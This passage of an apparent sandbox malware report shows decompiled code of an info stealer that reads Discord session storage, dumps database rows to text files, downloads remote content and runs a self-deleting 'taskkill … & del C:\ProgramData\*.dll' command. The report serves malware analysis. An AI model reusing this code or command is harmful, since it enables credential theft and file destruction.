                                                                                					__eflags = 0;
                                                                                				} else {
                                                                                					_t133 = 1;
                                                                                				}
                                                                                				E00402C34(_t137 - 0x48, 1, 0);
                                                                                				 *((char*)(_t137 - 4)) = 0;
                                                                                				E00402C34(_t137 - 0x2c, 1, 0);
                                                                                				_t157 = _t133;
                                                                                				if(_t133 != 0) {
                                                                                					 *((intOrPtr*)(_t137 - 0x18)) = _t129;
                                                                                					 *((intOrPtr*)(_t137 - 0x1c)) = 0;
                                                                                					 *((char*)(_t137 - 0x2c)) = 0;
                                                                                					E00403A16(_t137 - 0x2c, _t157, "\\Session Storage", 0x10);
                                                                                					 *((char*)(_t137 - 4)) = 6;
                                                                                					_t91 = E0040D3FA(_t137 - 0x2c, _t137 - 0x48,  *((intOrPtr*)(_t137 - 0x4c)), _t137 - 0x2c);
                                                                                					_t141 = _t140 + 0xc;
                                                                                					 *((char*)(_t137 - 4)) = 7;
                                                                                					_t158 =  *((intOrPtr*)(_t91 + 0x14)) - 0x10;
                                                                                					if( *((intOrPtr*)(_t91 + 0x14)) >= 0x10) {
                                                                                						_t91 =  *_t91;
                                                                                					}
                                                                                					_push(_t91);
                                                                                					_t142 = _t141 - 0x1c;
                                                                                					_t133 = _t142;
                                                                                					 *((intOrPtr*)(_t137 - 0x50)) = _t142;
                                                                                					E0040410F(_t142, _t137 + 8);
                                                                                					_t143 = _t142 - 0x1c;
                                                                                					 *((char*)(_t137 - 4)) = 8;
                                                                                					_t119 = _t143;
                                                                                					 *((intOrPtr*)(_t137 - 0x54)) = _t143;
                                                                                					 *((intOrPtr*)(_t119 + 0x14)) = _t129;
                                                                                					 *((intOrPtr*)(_t119 + 0x10)) = 0;
                                                                                					 *_t119 = 0;
                                                                                					E0040381A(_t119, "Discord");
                                                                                					 *((char*)(_t137 - 4)) = 7;
                                                                                					E00408B6B(0, "Session Storage", _t129, _t142, _t158);
                                                                                					E00402C34(_t137 - 0x48, 1, 0);
                                                                                					E00402C34(_t137 - 0x2c, 1, 0);
                                                                                				}
                                                                                				E00402C34(_t137 + 8, 1, 0);
                                                                                				return E00421A61(0, _t129, _t133);
                                                                                			}


                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 00408D91
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00408DD9
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00408EDD
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                  • Part of subcall function 00403A16: _memmove.LIBCMT ref: 00403A67
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile_memmove$H_prolog3_
                                                                                • String ID: Discord$Local Storage$Session Storage$\Local Storage\leveldb$\Local Storage\leveldb\CURRENT$\Session Storage$\Session Storage\CURRENT
                                                                                • API String ID: 3897036665-2019736363
                                                                                • Opcode ID: 77873705305797e79846ad8ca8a139fed172b08db23b550f555bffd445ecd5d7
                                                                                • Instruction ID: 58f3edf5dd504767c655dd6b14a28e644c8b2ac7b9e3a0a1c009e80bcc8cebfa
                                                                                • Opcode Fuzzy Hash: 77873705305797e79846ad8ca8a139fed172b08db23b550f555bffd445ecd5d7
                                                                                • Instruction Fuzzy Hash: E761C570C0124CAEDB14EFA9C546ADEBF78DF15304F10806EE554B72D2C7B85A09CBA6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 78%
                                                                                			E004179DA(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* __ebp;
                                                                                				signed int _t38;
                                                                                				void* _t43;
                                                                                				void* _t45;
                                                                                				void* _t47;
                                                                                				void* _t49;
                                                                                				void* _t51;
                                                                                				void* _t53;
                                                                                				intOrPtr _t64;
                                                                                				void* _t67;
                                                                                				void* _t74;
                                                                                				void* _t75;
                                                                                				void* _t88;
                                                                                				intOrPtr _t92;
                                                                                				void* _t93;
                                                                                				void* _t97;
                                                                                				signed int _t98;
                                                                                				void* _t100;
                                                                                
                                                                                				_t88 = __edx;
                                                                                				_t75 = __ecx;
                                                                                				_t98 = _t100 - 0xc0;
                                                                                				_t38 =  *0x447674; // 0x4124c941
                                                                                				 *(_t98 + 0xc4) = _t38 ^ _t98;
                                                                                				_push(0x3c);
                                                                                				E00421975(E00436481, __ebx, __edi, __esi);
                                                                                				_t43 = E00417713(_t98 + 0x1c, GetCurrentProcessId());
                                                                                				 *((intOrPtr*)(_t98 - 4)) = 0;
                                                                                				_push(GetCurrentProcessId());
                                                                                				_t45 = E00417918(_t98 + 0x54);
                                                                                				 *((char*)(_t98 - 4)) = 1;
                                                                                				_t47 = E0040D3FA(_t75, _t98 + 0x70, "/c taskkill /im ", _t45);
                                                                                				 *((char*)(_t98 - 4)) = 2;
                                                                                				_t49 = E0040D3C3(_t75, _t98 + 0x8c, _t47, " /f & timeout /t 6 & del /f /q \"");
                                                                                				 *((char*)(_t98 - 4)) = 3;
                                                                                				_t51 = E0040D431(_t43, _t98);
                                                                                				 *((char*)(_t98 - 4)) = 4;
                                                                                				_t53 = E0040D3C3(_t49, _t98 + 0x38, _t51, "\" & del C:\\ProgramData\\*.dll");
                                                                                				 *((char*)(_t98 - 4)) = 5;
                                                                                				E0040D3C3(_t49, _t98 + 0xa8, _t53, " & exit");
                                                                                				E00402C34(_t98 + 0x38, 1, 0);
                                                                                				E00402C34(_t98, 1, 0);
                                                                                				E00402C34(_t98 + 0x8c, 1, 0);
                                                                                				E00402C34(_t98 + 0x70, 1, 0);
                                                                                				E00402C34(_t98 + 0x54, 1, 0);
                                                                                				 *((char*)(_t98 - 4)) = 0xc;
                                                                                				E00402C34(_t98 + 0x1c, 1, 0);
                                                                                				_t92 = 0x3c;
                                                                                				E00427E30(_t98 - 0x48, 0, _t92);
                                                                                				_t64 =  *((intOrPtr*)(_t98 + 0xa8));
                                                                                				 *((intOrPtr*)(_t98 - 0x48)) = _t92;
                                                                                				 *((intOrPtr*)(_t98 - 0x44)) = 0;
                                                                                				 *((intOrPtr*)(_t98 - 0x40)) = 0;
                                                                                				 *(_t98 - 0x3c) = "open";
                                                                                				 *(_t98 - 0x38) = "C:\\Windows\\System32\\cmd.exe";
                                                                                				if( *((intOrPtr*)(_t98 + 0xbc)) < 0x10) {
                                                                                					_t64 = _t98 + 0xa8;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t98 - 0x34)) = _t64;
                                                                                				 *((intOrPtr*)(_t98 - 0x30)) = 0;
                                                                                				 *((intOrPtr*)(_t98 - 0x2c)) = 0;
                                                                                				 *((intOrPtr*)(_t98 - 0x28)) = 0;
                                                                                				 *0x44a1f8(_t98 - 0x48);
                                                                                				_t67 = E00402C34(_t98 + 0xa8, 1, 0);
                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
                                                                                				_pop(_t93);
                                                                                				_pop(_t97);
                                                                                				_pop(_t74);
                                                                                				return E0041DEB4(_t67, _t74,  *(_t98 + 0xc4) ^ _t98, _t88, _t93, _t97);
                                                                                			}


                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 004179F9
                                                                                • GetCurrentProcessId.KERNEL32(0000003C), ref: 00417A04
                                                                                  • Part of subcall function 00417713: OpenProcess.KERNEL32(00000410,00000000,0040AD62,00000000,00000000), ref: 0041773A
                                                                                  • Part of subcall function 00417713: GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00417754
                                                                                  • Part of subcall function 00417713: CloseHandle.KERNEL32(00000000), ref: 0041775B
                                                                                • GetCurrentProcessId.KERNEL32(00000000), ref: 00417A16
                                                                                  • Part of subcall function 00417918: _memset.LIBCMT ref: 00417959
                                                                                  • Part of subcall function 00417918: OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,00000000), ref: 0041796B
                                                                                  • Part of subcall function 00417918: EnumProcessModules.PSAPI(00000000,?,00000004,?,?,00000000,00000000), ref: 00417982
                                                                                  • Part of subcall function 00417918: GetModuleBaseNameA.PSAPI(00000000,?,?,00000104,?,00000000,00000000), ref: 00417999
                                                                                  • Part of subcall function 00417918: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 004179A0
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                • _memset.LIBCMT ref: 00417AD3
                                                                                • ShellExecuteEx.SHELL32(?), ref: 00417B17
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseCurrentHandleModuleNameOpen_memset$BaseEnumExecuteFileH_prolog3ModulesShell_memmove
                                                                                • String ID: & exit$ /f & timeout /t 6 & del /f /q "$" & del C:\ProgramData\*.dll$/c taskkill /im $t&D
                                                                                • API String ID: 1885640224-3690632989
                                                                                • Opcode ID: 1ac7323dfcd76826bae77427d14ccdd60a79c14ef8668bc3115f382a70a13d5b
                                                                                • Instruction ID: f2fe229286dc5b8cd2e6409dfae781f0c56afba22a1cd5bd27651a8d6bb83568
                                                                                • Opcode Fuzzy Hash: 1ac7323dfcd76826bae77427d14ccdd60a79c14ef8668bc3115f382a70a13d5b
                                                                                • Instruction Fuzzy Hash: 12418171905258ABEB25EF99CD85FDF7BBCAF14304F00442BF405A3181DB785A09CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 20%
                                                                                			E00410639(CHAR* __ecx, void* __edx) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t24;
                                                                                				void* _t39;
                                                                                				int _t41;
                                                                                				void* _t44;
                                                                                				void* _t49;
                                                                                				intOrPtr _t50;
                                                                                				void* _t54;
                                                                                				void* _t55;
                                                                                				void* _t56;
                                                                                				void* _t57;
                                                                                				void* _t68;
                                                                                				CHAR* _t69;
                                                                                				void* _t71;
                                                                                				void* _t72;
                                                                                				void* _t75;
                                                                                				signed int _t76;
                                                                                				void* _t78;
                                                                                				void* _t80;
                                                                                				void* _t82;
                                                                                
                                                                                				_t67 = __edx;
                                                                                				_t76 = _t78 - 0x198;
                                                                                				_t24 =  *0x447674; // 0x4124c941
                                                                                				 *(_t76 + 0x194) = _t24 ^ _t76;
                                                                                				 *((intOrPtr*)(_t76 - 0x80)) =  *((intOrPtr*)(_t76 + 0x1a0));
                                                                                				_t69 = __ecx;
                                                                                				_t55 = __edx;
                                                                                				GetCurrentDirectoryA(0x104, _t76 + 0x90);
                                                                                				 *0x44a1b8(_t76 + 0x90, "\\temp", _t68, _t72, _t54);
                                                                                				CopyFileA(_t69, _t76 + 0x90, 1);
                                                                                				E00427E30(_t76 - 0x74, 0, 0x104);
                                                                                				wsprintfA(_t76 - 0x74, "Downloads\\%s_%s.txt",  *((intOrPtr*)(_t76 - 0x80)), _t55);
                                                                                				_t74 =  *0x44a004; // 0x1498090
                                                                                				_t39 =  *0x44a0a4(_t76 + 0x90, _t76 - 0x7c);
                                                                                				_t80 = _t78 - 0x218 + 0x24;
                                                                                				if(_t39 == 0) {
                                                                                					_t44 =  *0x44a058( *((intOrPtr*)(_t76 - 0x7c)), _t74, 0xffffffff, _t76 - 0x78, 0);
                                                                                					_t82 = _t80 + 0x14;
                                                                                					if(_t44 == 0) {
                                                                                						_t57 = E00420300(_t76 - 0x74, "w");
                                                                                						if(_t57 != 0) {
                                                                                							_t49 =  *0x44a074( *((intOrPtr*)(_t76 - 0x78)));
                                                                                							while(1) {
                                                                                								_t86 = _t49 - 0x64;
                                                                                								if(_t49 != 0x64) {
                                                                                									break;
                                                                                								}
                                                                                								_t50 =  *0x44a094( *((intOrPtr*)(_t76 - 0x78)), 0);
                                                                                								_t74 = _t50;
                                                                                								E0041E879(_t57, 0, _t50, __eflags);
                                                                                								_t49 =  *0x44a074( *((intOrPtr*)(_t76 - 0x78)), _t57, "%s\n%s\n\n", _t50,  *0x44a094( *((intOrPtr*)(_t76 - 0x78)), 1));
                                                                                								_t82 = _t82 + 0x24;
                                                                                							}
                                                                                							_push(_t57);
                                                                                							E0041EAA2(_t57, 0, _t74, _t86);
                                                                                						}
                                                                                					}
                                                                                					 *0x44a078( *((intOrPtr*)(_t76 - 0x78)));
                                                                                					 *0x44a0a8( *((intOrPtr*)(_t76 - 0x7c)));
                                                                                				}
                                                                                				_t41 = DeleteFileA(_t76 + 0x90);
                                                                                				_pop(_t71);
                                                                                				_pop(_t75);
                                                                                				_pop(_t56);
                                                                                				return E0041DEB4(_t41, _t56,  *(_t76 + 0x194) ^ _t76, _t67, _t71, _t75);
                                                                                			}


                                                                                APIs
                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?), ref: 00410671
                                                                                • lstrcat.KERNEL32(?,\temp), ref: 00410683
                                                                                • CopyFileA.KERNEL32 ref: 00410693
                                                                                • _memset.LIBCMT ref: 004106A1
                                                                                • wsprintfA.USER32 ref: 004106B3
                                                                                • DeleteFileA.KERNEL32(?), ref: 0041076C
                                                                                  • Part of subcall function 00420300: __fsopen.LIBCMT ref: 0042030D
                                                                                • _fprintf.LIBCMT ref: 00410734
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CopyCurrentDeleteDirectory__fsopen_fprintf_memsetlstrcatwsprintf
                                                                                • String ID: %s%s$Downloads\%s_%s.txt$\temp
                                                                                • API String ID: 2003248957-2902098628
                                                                                • Opcode ID: 10a316f53b1d713247eaf26388e9575f214ff18326f33f647ff6aa08b3d5e49c
                                                                                • Instruction ID: d0b772d3446a144e0e8b2f786391cf3ddfe19688f3e22923ccd0821d81ed220e
                                                                                • Opcode Fuzzy Hash: 10a316f53b1d713247eaf26388e9575f214ff18326f33f647ff6aa08b3d5e49c
                                                                                • Instruction Fuzzy Hash: 62319576940108AFDB209FB5EC48EDE7BBCEF05315F10003AF619D3152EA7999948F59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E00413C5A(void* __ebx) {
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* _t2;
                                                                                				struct HINSTANCE__* _t3;
                                                                                				void* _t18;
                                                                                				intOrPtr _t20;
                                                                                				void* _t22;
                                                                                				intOrPtr _t28;
                                                                                				intOrPtr _t29;
                                                                                				intOrPtr _t30;
                                                                                				intOrPtr _t31;
                                                                                				intOrPtr _t32;
                                                                                				intOrPtr _t33;
                                                                                
                                                                                				_t20 =  *0x449ee0; // 0x14a06e0
                                                                                				_t25 = _t20;
                                                                                				if(_t20 == 0) {
                                                                                					L12:
                                                                                					__eflags = 0;
                                                                                					return 0;
                                                                                				}
                                                                                				_push("PATH");
                                                                                				_t2 = E0041F644(__ebx, 0, _t20, _t25);
                                                                                				_t26 = _t2;
                                                                                				if(_t2 != 0) {
                                                                                					_push(0);
                                                                                					_push(_t20);
                                                                                					_t22 = E0040F445(_t2, ";");
                                                                                					_push(0);
                                                                                					_push(E0040F445("PATH=", _t22));
                                                                                					E00420E63(__ebx, _t18, 0, _t22, _t26);
                                                                                					_push(_t22);
                                                                                					E0041EE8B();
                                                                                				}
                                                                                				_t3 = LoadLibraryA( *0x449f78);
                                                                                				 *0x44a09c = _t3;
                                                                                				if(_t3 != 0) {
                                                                                					 *0x44a090 = GetProcAddress(_t3,  *0x449cd0);
                                                                                					 *0x44a0ac = GetProcAddress( *0x44a09c,  *0x449f20);
                                                                                					 *0x44a05c = GetProcAddress( *0x44a09c,  *0x449c40);
                                                                                					 *0x44a084 = GetProcAddress( *0x44a09c,  *0x449bd4);
                                                                                					 *0x44a0a0 = GetProcAddress( *0x44a09c,  *0x44a014);
                                                                                					 *0x44a07c = GetProcAddress( *0x44a09c,  *0x449d44);
                                                                                				}
                                                                                				_t28 =  *0x44a090; // 0x0
                                                                                				if(_t28 == 0) {
                                                                                					goto L12;
                                                                                				} else {
                                                                                					_t29 =  *0x44a0ac; // 0x0
                                                                                					if(_t29 == 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_t30 =  *0x44a05c; // 0x0
                                                                                					if(_t30 == 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_t31 =  *0x44a0a0; // 0x0
                                                                                					if(_t31 == 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_t32 =  *0x44a07c; // 0x0
                                                                                					if(_t32 == 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_t33 =  *0x44a084; // 0x0
                                                                                					if(_t33 == 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					return 1;
                                                                                				}
                                                                                			}

















                                                                                APIs
                                                                                • __wgetenv.LIBCMT ref: 00413C71
                                                                                • LoadLibraryA.KERNEL32(014A10F8,00000104,00413E0B,?,?,?,?,?,?), ref: 00413CAB
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00413CC7
                                                                                • GetProcAddress.KERNEL32 ref: 00413CDA
                                                                                • GetProcAddress.KERNEL32 ref: 00413CED
                                                                                • GetProcAddress.KERNEL32 ref: 00413D00
                                                                                • GetProcAddress.KERNEL32 ref: 00413D13
                                                                                • GetProcAddress.KERNEL32 ref: 00413D26
                                                                                  • Part of subcall function 0040F445: lstrlenA.KERNEL32(00000104,00000000,014A06E0,?,?,00413C88,00000000,00440C68,014A06E0,00000000,014A10F8,00000104,00413E0B), ref: 0040F44E
                                                                                  • Part of subcall function 0040F445: lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 0040F463
                                                                                  • Part of subcall function 0040F445: lstrcpy.KERNEL32(00000000,?), ref: 0040F482
                                                                                  • Part of subcall function 0040F445: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040F489
                                                                                  • Part of subcall function 0040F445: lstrcpy.KERNEL32(00000001,?), ref: 0040F49D
                                                                                  • Part of subcall function 0040F445: lstrlenA.KERNEL32(00000001,?,?,?,?,?,?), ref: 0040F4A4
                                                                                  • Part of subcall function 00420E63: __lock.LIBCMT ref: 00420E71
                                                                                  • Part of subcall function 00420E63: __putenv_helper.LIBCMT ref: 00420E80
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$lstrlen$lstrcpy$LibraryLoad__lock__putenv_helper__wgetenv
                                                                                • String ID: PATH$PATH=
                                                                                • API String ID: 2068308339-3104081819
                                                                                • Opcode ID: 397a5612f5acb24916ca6c2c871f661c475b863aecbfe5fe112c7ac0194e49bb
                                                                                • Instruction ID: 75994e38a15df25db20486ea45de51005bb769fbd545efdc2794ba4c605e3613
                                                                                • Opcode Fuzzy Hash: 397a5612f5acb24916ca6c2c871f661c475b863aecbfe5fe112c7ac0194e49bb
                                                                                • Instruction Fuzzy Hash: EC210CBDC80610EEDB229F36FC059677FA5F746711318413BE91491230E63A09A0EF6E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 95%
                                                                                			E0041C194(void* __ecx, void* __edx, signed short* _a4, long* _a8, signed int* _a12) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _v36;
                                                                                				intOrPtr _v44;
                                                                                				intOrPtr _v52;
                                                                                				struct _BY_HANDLE_FILE_INFORMATION _v60;
                                                                                				signed short _v64;
                                                                                				void _v68;
                                                                                				void* _v72;
                                                                                				long _v76;
                                                                                				signed int* _v80;
                                                                                				void* _v84;
                                                                                				long _v88;
                                                                                				void _v92;
                                                                                				long* _v96;
                                                                                				signed short* _v100;
                                                                                				void _v104;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t83;
                                                                                				signed int _t93;
                                                                                				long _t94;
                                                                                				signed short* _t95;
                                                                                				long* _t96;
                                                                                				void* _t97;
                                                                                				long _t115;
                                                                                				void _t120;
                                                                                				signed char _t123;
                                                                                				void* _t133;
                                                                                				signed int _t137;
                                                                                
                                                                                				_t133 = __edx;
                                                                                				_t83 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t83 ^ _t137;
                                                                                				_v100 = _a4;
                                                                                				_v96 = _a8;
                                                                                				_v80 = _a12;
                                                                                				_t134 = __ecx;
                                                                                				_t135 = __edx;
                                                                                				_v72 = __ecx;
                                                                                				_v84 = __edx;
                                                                                				if(GetFileInformationByHandle(__ecx,  &_v60) != 0) {
                                                                                					_t123 = _v60.dwFileAttributes;
                                                                                					_v68 = _t123;
                                                                                					_t13 =  &_v68;
                                                                                					 *_t13 = _v68 & 1;
                                                                                					_v64 = 0;
                                                                                					if( *_t13 != 0) {
                                                                                						_v64 = 1;
                                                                                					}
                                                                                					if((_t123 & 0x00000002) != 0) {
                                                                                						_v64 = _v64 | 0x00000002;
                                                                                					}
                                                                                					if((_t123 & 0x00000004) != 0) {
                                                                                						_v64 = _v64 | 0x00000004;
                                                                                					}
                                                                                					_t93 = _t123 & 0x00000010;
                                                                                					if(_t93 != 0) {
                                                                                						_v64 = _v64 | 0x00000010;
                                                                                					}
                                                                                					if((_t123 & 0x00000020) != 0) {
                                                                                						_v64 = _v64 | 0x00000020;
                                                                                					}
                                                                                					if(_t93 == 0) {
                                                                                						_v64 = _v64 | 0x80000000;
                                                                                					} else {
                                                                                						_v64 = _v64 | 0x40000000;
                                                                                					}
                                                                                					_v64 = _v64 | 0x01000000;
                                                                                					if(_v68 == 0) {
                                                                                						_v64 = _v64 | 0x00800000;
                                                                                					}
                                                                                					_t94 = GetFileSize(_t134, 0);
                                                                                					_v76 = _t94;
                                                                                					if(_t94 > 0x28) {
                                                                                						SetFilePointer(_t134, 0, 0, 0);
                                                                                						_t134 = ReadFile;
                                                                                						ReadFile(ReadFile,  &_v68, 2,  &_v88, 0);
                                                                                						SetFilePointer(_v72, 0x24, 0, 0);
                                                                                						ReadFile(_v72,  &_v104, 4,  &_v88, 0);
                                                                                						if(_v68 == 0x54ad) {
                                                                                							_t115 = _v104;
                                                                                							if(_v76 > _t115 + 0x34) {
                                                                                								SetFilePointer(_v72, _t115, 0, 0);
                                                                                								ReadFile(_v72,  &_v92, 4,  &_v88, 0);
                                                                                								_t120 = _v92;
                                                                                								if(_t120 == 0x5a4d || _t120 == 0x454e || _t120 == 0x454c || _t120 == 0x4550) {
                                                                                									_v64 = _v64 | 0x00400000;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						_t135 = _v84;
                                                                                					}
                                                                                					_t95 = _v100;
                                                                                					if(_t95 != 0) {
                                                                                						 *_t95 = _v64;
                                                                                					}
                                                                                					_t96 = _v96;
                                                                                					if(_t96 != 0) {
                                                                                						 *_t96 = _v76;
                                                                                					}
                                                                                					if(_t135 != 0) {
                                                                                						 *_t135 = E0041C10B(_v60.ftLastAccessTime, _v44);
                                                                                						 *((intOrPtr*)(_t135 + 4)) = _t133;
                                                                                						 *((intOrPtr*)(_t135 + 8)) = E0041C10B(_v60.ftLastWriteTime, _v36);
                                                                                						 *((intOrPtr*)(_t135 + 0xc)) = _t133;
                                                                                						 *((intOrPtr*)(_t135 + 0x10)) = E0041C10B(_v60.ftCreationTime, _v52);
                                                                                						 *((intOrPtr*)(_t135 + 0x14)) = _t133;
                                                                                					}
                                                                                					if(_v80 != 0) {
                                                                                						_push(_v36);
                                                                                						_t134 =  &_v64;
                                                                                						_t135 =  &_v68;
                                                                                						E0041C12D( &_v64,  &_v68, _v60.ftLastWriteTime);
                                                                                						 *_v80 = (_v68 & 0x0000ffff) << 0x00000010 | _v64 & 0x0000ffff;
                                                                                					}
                                                                                					_t97 = 0;
                                                                                				} else {
                                                                                					_t97 = 0x200;
                                                                                				}
                                                                                				return E0041DEB4(_t97, 0, _v8 ^ _t137, _t133, _t134, _t135);
                                                                                			}


































                                                                                APIs
                                                                                • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0041C1C8
                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0041C241
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041C25D
                                                                                • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041C271
                                                                                • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041C27A
                                                                                • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041C28A
                                                                                • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041C2A8
                                                                                • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041C2B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$PointerRead$HandleInformationSize
                                                                                • String ID:
                                                                                • API String ID: 2979504256-3916222277
                                                                                • Opcode ID: d7bcea8a3ed810e61efb2844ff5c01f9d5f4b6e0ead47ce4f4ce520dedbd38fc
                                                                                • Instruction ID: 749df1396252e083767a2290ce791a9194bbe4c11cd21ffb88b2f6a14314418b
                                                                                • Opcode Fuzzy Hash: d7bcea8a3ed810e61efb2844ff5c01f9d5f4b6e0ead47ce4f4ce520dedbd38fc
                                                                                • Instruction Fuzzy Hash: B451F3B1D40218AFDB28DFD9DC85AEEBBB9EB08304F10446AE511E7260D7789D85CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			E0040EF26(char* __ecx) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t21;
                                                                                				void* _t25;
                                                                                				void* _t31;
                                                                                				void* _t37;
                                                                                				void* _t38;
                                                                                				char* _t46;
                                                                                				void* _t47;
                                                                                				void* _t48;
                                                                                				void* _t51;
                                                                                				signed int _t52;
                                                                                				void* _t54;
                                                                                
                                                                                				_t52 = _t54 - 0x394;
                                                                                				_t21 =  *0x447674; // 0x4124c941
                                                                                				 *(_t52 + 0x390) = _t21 ^ _t52;
                                                                                				_t46 = __ecx;
                                                                                				 *(_t52 - 0x74) = 1;
                                                                                				_t37 = HeapAlloc(GetProcessHeap(), 0, 0x5f5e0ff);
                                                                                				_t25 = InternetOpenA(0x43e028, 0, 0, 0, 0);
                                                                                				 *(_t52 - 0x78) = _t25;
                                                                                				 *(_t52 - 0x80) = 0x927c0;
                                                                                				InternetSetOptionA(_t25, 2, _t52 - 0x80, 4);
                                                                                				 *(_t52 - 0x7c) = InternetOpenUrlA( *(_t52 - 0x78), _t46, 0, 0, 0x4000100, 0);
                                                                                				_t47 = 0;
                                                                                				while( *(_t52 - 0x74) > 0) {
                                                                                					InternetReadFile( *(_t52 - 0x7c), _t52 - 0x70, 0x400, _t52 - 0x74);
                                                                                					_t31 = 0;
                                                                                					if( *(_t52 - 0x74) > 0) {
                                                                                						do {
                                                                                							 *((char*)(_t47 + _t37)) =  *((intOrPtr*)(_t52 + _t31 - 0x70));
                                                                                							_t47 = _t47 + 1;
                                                                                							_t31 = _t31 + 1;
                                                                                						} while (_t31 <  *(_t52 - 0x74));
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                				InternetCloseHandle( *(_t52 - 0x7c));
